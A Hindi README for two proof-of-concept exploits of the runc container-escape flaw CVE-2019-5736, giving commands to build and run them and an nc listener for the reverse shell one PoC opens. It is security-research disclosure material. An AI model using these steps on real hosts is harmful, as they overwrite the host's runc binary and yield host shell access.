
CVE-2019-5736 POCs
CVE-2019-5736 के लिए दो PoCs। CVE-2019-5736 और PoCs के स्पष्टीकरण के लिए Twistlock Labs देखें।
दुर्भावनापूर्ण इमेज PoC q3k के PoC पर आधारित है, इसलिए सारा श्रेय उन्हीं को जाता है।
ध्यान दें कि PoCs चलाने से होस्ट पर runc बाइनरी ओवरराइट हो जाएगी। यह अनुशंसा की जाती है कि PoCs में से कोई भी चलाने से पहले आप अपनी runc बाइनरी (सामान्यतः /usr/sbin/runc पर) की एक प्रति बना लें।
रिपॉजिटरी को क्लोन करें:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
एक सरल प्रोग्राम जो एक स्ट्रिंग प्रिंट करता है, के साथ runc को ओवरराइट करता है।
Exec PoC चलाना:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
एक सरल रिवर्स शेल बैश स्क्रिप्ट जो localhost:2345 से कनेक्ट होती है, के साथ runc को ओवरराइट करता है।
रिवर्स शेल के लिए सुनें:
$ nc -nvlp 2345
एक अलग शेल से, Malicious Image PoC चलाएँ:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC